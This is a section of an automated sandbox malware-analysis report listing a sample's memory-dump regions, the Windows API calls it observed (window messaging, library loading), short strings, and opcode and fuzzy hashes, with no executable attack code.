                                                  • Source File: 00000000.00000002.3547802672.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b40000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,05B4C431,00000800,00000000,00000000), ref: 05B4C642
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547802672.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b40000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  APIs
                                                  • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 09852BB5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: LongWindow
                                                  • String ID:
                                                  • API String ID: 1378638983-0
                                                  APIs
                                                  • SetWindowTextW.USER32(?,00000000), ref: 05BDCCD2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: TextWindow
                                                  • String ID:
                                                  • API String ID: 530164218-0
                                                  APIs
                                                  • SetWindowTextW.USER32(?,00000000), ref: 05BDCCD2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: TextWindow
                                                  • String ID:
                                                  • API String ID: 530164218-0
                                                  APIs
                                                  • PeekMessageW.USER32(?,?,?,?,?), ref: 0AD18B80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePeek
                                                  • String ID:
                                                  • API String ID: 2222842502-0
                                                  APIs
                                                  • PeekMessageW.USER32(?,?,?,?,?), ref: 0AD18B80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePeek
                                                  • String ID:
                                                  • API String ID: 2222842502-0
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0AD18E4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0AD18E4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0B3AB327
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0B3AB327
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 05BDFB85
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  APIs
                                                  • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 09852BB5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: LongWindow
                                                  • String ID:
                                                  • API String ID: 1378638983-0
                                                  APIs
                                                  • SendMessageW.USER32(?,00000018,00000001,?), ref: 05BDFF5D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 05BDFB85
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 05B4BFB6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547802672.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b40000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  APIs
                                                  • SendMessageW.USER32(?,?,?,?), ref: 05BDD515
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 0AD12A7D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?), ref: 0AD18D98
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (uq
                                                  • API String ID: 0-224692576
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DispatchMessage
                                                  • String ID:
                                                  • API String ID: 2061451462-0
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?), ref: 0AD18D98
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  APIs
                                                  • SendMessageW.USER32(?,?,?,?), ref: 05BDD515
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  APIs
                                                  • SendMessageW.USER32(?,00000018,00000001,?), ref: 05BDFF5D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DispatchMessage
                                                  • String ID:
                                                  • API String ID: 2061451462-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Huq
                                                  • API String ID: 0-93357626
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (uq
                                                  • API String ID: 0-224692576
                                                  • Opcode ID: 5854a1b3e2b1ceeed5a5e3c544e27bdb1def29156071b40f3cbddda7293c9cc0
                                                  • Instruction ID: 0189d9bb2cd1a9fa4bc243b67584826a8161e91ba181e048a5a6d11fc70b2259
                                                  • Opcode Fuzzy Hash: 5854a1b3e2b1ceeed5a5e3c544e27bdb1def29156071b40f3cbddda7293c9cc0
                                                  • Instruction Fuzzy Hash: 05112B36B192656FDF49A77C981857F3FF9DFC660031844AEE406C7342DD258C0683A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Teqq
                                                  • API String ID: 0-974210879
                                                  • Opcode ID: 1e9bfbc70511486d781e34fb7db2c8dbf154c4443c79b5e06b82eff5b65ceb5b
                                                  • Instruction ID: 69242ea4d52aae6336dbbb01b5aa1234f2559532edb37897f3f3f125803f556d
                                                  • Opcode Fuzzy Hash: 1e9bfbc70511486d781e34fb7db2c8dbf154c4443c79b5e06b82eff5b65ceb5b
                                                  • Instruction Fuzzy Hash: F6115E71B1020A9BCF54EBB999505EFBAF6AF89310F14406DD505EB344EB319D05CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 807ff81e18a89956e59c0691c8c8f67eff3948acfb95c9fc8f42a2da8b1ee791
                                                  • Instruction ID: 64c5b57fc7fea62623d32c0719a0e29682bdac89e48328a23e0ad9c73203295b
                                                  • Opcode Fuzzy Hash: 807ff81e18a89956e59c0691c8c8f67eff3948acfb95c9fc8f42a2da8b1ee791
                                                  • Instruction Fuzzy Hash: FB11A571B04215DBCF16AA6C88946BEB7A6EF95204F08807DE909DB340CB32C845C7E6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c6fa98bc79e3d502900ce3523e3718d1be57172c52c9b9379de25b1304a73007
                                                  • Instruction ID: 884a7c1fe0bab68dfa8ce1cf539d7925b0563716c2d35d399425335d55559ce9
                                                  • Opcode Fuzzy Hash: c6fa98bc79e3d502900ce3523e3718d1be57172c52c9b9379de25b1304a73007
                                                  • Instruction Fuzzy Hash: C362D2B0D21B41CFDF745F7489987ADB6B1AB56344F14891FE0FACA3A0EB3498458B42
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65cdd743e6f983e4f828910e304810f14942db4b90ec8128cef75b94d5868709
                                                  • Instruction ID: 5f62962a55114c801eca5f9fd44e421eff6a73a5b2fcbbded93cde8234c2001a
                                                  • Opcode Fuzzy Hash: 65cdd743e6f983e4f828910e304810f14942db4b90ec8128cef75b94d5868709
                                                  • Instruction Fuzzy Hash: 41226EB0D25F42CFDB705F648A8879EB6B0AB15384F248D1FD0FACA365E73494868B45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 86d112fe918daf8a4a59a8e21137978f5a23c1fcf9f66fa0d6fa325c28be232a
                                                  • Instruction ID: 570e2d58748c16d91d470dfc271a63bb09c5110d9aed09fa8f05d0e71f69f46e
                                                  • Opcode Fuzzy Hash: 86d112fe918daf8a4a59a8e21137978f5a23c1fcf9f66fa0d6fa325c28be232a
                                                  • Instruction Fuzzy Hash: BBD0923600E3E0AFCB0757708951951BFB1EF4B24475984DBE1C58F1B3C622482EDBA2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 350e50e619a0533d9b321c3f75536cc43a79fddffcc48df4e7748f07e69a9de5
                                                  • Instruction ID: 4b442437c59561c2740a97d1114bfdf3c4b189c901e6fe3f4b1b956051406434
                                                  • Opcode Fuzzy Hash: 350e50e619a0533d9b321c3f75536cc43a79fddffcc48df4e7748f07e69a9de5
                                                  • Instruction Fuzzy Hash: 97816035A10209DFCF04DFA4E8989ADBBB5FF89305F148569E502EB364DB70A945CF90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 77dec266e9a1760a7c73e277452ea9a9190275b4ee0827cfdb04c042db9cdebc
                                                  • Instruction ID: f9be6e02672e9258b937dddfa5824365ddce273d7274a382c6f61225edeccaad
                                                  • Opcode Fuzzy Hash: 77dec266e9a1760a7c73e277452ea9a9190275b4ee0827cfdb04c042db9cdebc
                                                  • Instruction Fuzzy Hash: A771E675A107059FCB24CFBDD98869EBBF1FB48210B148A2EE85AD3740DB34E9448B51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 48874a9f09911f5649299ad67a01e5d30758675e5a16f587b2f8a96aa308fe0d
                                                  • Instruction ID: 13f0d04561e393d7364f1de0c618b13848be680a3936da206039798f5c90965f
                                                  • Opcode Fuzzy Hash: 48874a9f09911f5649299ad67a01e5d30758675e5a16f587b2f8a96aa308fe0d
                                                  • Instruction Fuzzy Hash: 3E714B35A102099FDF18DFA8C8596AEBBB1FF88300F14816DE946E7351EB349945CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51807a2bd18689931e6481add5a6cec569c87adf1ee9c617a203ebc130f607d5
                                                  • Instruction ID: 938400ca6ff86a1e61a339ade8431848a3232d37fe01fedd5af68c5f9c2c7d7b
                                                  • Opcode Fuzzy Hash: 51807a2bd18689931e6481add5a6cec569c87adf1ee9c617a203ebc130f607d5
                                                  • Instruction Fuzzy Hash: 86516A707102148FCB24DF68C484B6ABBE6BF98705F18456DE40ADB3A1DB75EC41CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 56d62e8b4122aaf7e12cdfc9924ed65f77f7725ac648497f0579df2d8bce479a
                                                  • Instruction ID: 293cf79f13ac8249c03240ef9e4ea1f9881e7a86bb3de69abf4fa3a6678d2fa2
                                                  • Opcode Fuzzy Hash: 56d62e8b4122aaf7e12cdfc9924ed65f77f7725ac648497f0579df2d8bce479a
                                                  • Instruction Fuzzy Hash: E2611931A10609DFCF14DFA9C454A9DBBF1FF88310F158169E809AB360DB71AD85CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c44a73898642a986ab525b2a176348c7679c8854c993022b03274b02c8c5a7d6
                                                  • Instruction ID: 93a9c83b364ea74e16bac557ed8674f29aa2a4815b564c07f756221c119162ff
                                                  • Opcode Fuzzy Hash: c44a73898642a986ab525b2a176348c7679c8854c993022b03274b02c8c5a7d6
                                                  • Instruction Fuzzy Hash: D6611731A106099FCB14DFA9C458A9DBBF1FF88310F15816DE809EB3A0DB71AD85CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 00d60d7a5cc23a1fa197b41533aa64716ecab3e8c8103bd6aa8b27f1cd7373be
                                                  • Instruction ID: 95ce7b4e6d1d6285229f16f7980faa00351242145f3348ab0f0b4abd600d6bf2
                                                  • Opcode Fuzzy Hash: 00d60d7a5cc23a1fa197b41533aa64716ecab3e8c8103bd6aa8b27f1cd7373be
                                                  • Instruction Fuzzy Hash: 70514E75E142499FCF14DFA9C848AAFBFF5EF98310F14841AE416E7350EB7499018BA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c990c9f42e299f4566211726ad1f0ac2fcf09dd3845e93f9e73938d0e99f193
                                                  • Instruction ID: e3c97801f5c8527b7939e64bd5ff5b3b8aa82f8076bbafea53de0e06314b8eab
                                                  • Opcode Fuzzy Hash: 6c990c9f42e299f4566211726ad1f0ac2fcf09dd3845e93f9e73938d0e99f193
                                                  • Instruction Fuzzy Hash: 0C51F575A107059FCB24DFB9C588A9EBBF1FF48210B048A2DE85AD3741DB74E845CB50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f61ed1a291a69baa0c15c9fd43979b781e7cb3e176ac871835cd2d8f10fb127a
                                                  • Instruction ID: 31076bfacbdedfc60033e680e1caf79b4d3b7178dab3665533fe6e5655bd898d
                                                  • Opcode Fuzzy Hash: f61ed1a291a69baa0c15c9fd43979b781e7cb3e176ac871835cd2d8f10fb127a
                                                  • Instruction Fuzzy Hash: 51519E35A211099FDF18DB58D995BADB7B2EB8A300F28852DF606DB750CB34ED42CB41
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 96ad60b63a3c57f655e3a6f618fc69d9c5d4d771315252155392891f6a6c58a1
                                                  • Instruction ID: 3e92312871633e06d62f28878dafb6faee73c47e82173642d0a11480d74edc98
                                                  • Opcode Fuzzy Hash: 96ad60b63a3c57f655e3a6f618fc69d9c5d4d771315252155392891f6a6c58a1
                                                  • Instruction Fuzzy Hash: 8D414A30B241588FDB25DF69D894EADBBF6BF4A705F1840A9F905EB361DA35D800CB50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2fcb274cc557a8831ed162426040c064487579973345c3c3f737d322506a5695
                                                  • Instruction ID: e336625cdbc4069beb64ab22a7a2b8c991b18a207d02b620b3ff7a2b8bbdd346
                                                  • Opcode Fuzzy Hash: 2fcb274cc557a8831ed162426040c064487579973345c3c3f737d322506a5695
                                                  • Instruction Fuzzy Hash: 714167707102149FCB24DF68C484BAABBE6BF98705F18456DE00ADB3A1CB75EC41CBA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 05f71185ec7e18651a3687fc6d45b8fd2815a9d827d394360ead3c84597d652e
                                                  • Instruction ID: 15b9980e25241e0f3088cc7c85e978964786d386f1aa7cc3c6815f77035a50d3
                                                  • Opcode Fuzzy Hash: 05f71185ec7e18651a3687fc6d45b8fd2815a9d827d394360ead3c84597d652e
                                                  • Instruction Fuzzy Hash: B2412876E106199ACF04CFA9E8805EEFBF5FF48715F14802AE918E7210E7359906CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9fb588f8002b9c9db8a6a1dcaa9612f1436a4dd2d9a782c91d6e9e330b1d671d
                                                  • Instruction ID: 7309de0707b00efe5286c560c44f20de97b4003b36e3d705e2a7ea94c679eb89
                                                  • Opcode Fuzzy Hash: 9fb588f8002b9c9db8a6a1dcaa9612f1436a4dd2d9a782c91d6e9e330b1d671d
                                                  • Instruction Fuzzy Hash: 684169317106119FCB18DF29D484B95FBE1FF85326F148AADE169CB3A1CB31A946CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4a531cffe57a6d8b76f36fd24137033ab8c5255ada31e718be031237f6562725
                                                  • Instruction ID: da210116c22bbb493cd879d62c94f3e3239756a220f9b4e0c4904444b2f200b1
                                                  • Opcode Fuzzy Hash: 4a531cffe57a6d8b76f36fd24137033ab8c5255ada31e718be031237f6562725
                                                  • Instruction Fuzzy Hash: 2341BDB1A107499FDB20CF69D8847AEBFF0AF98314F18806EE459E7342C7349909CB94
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
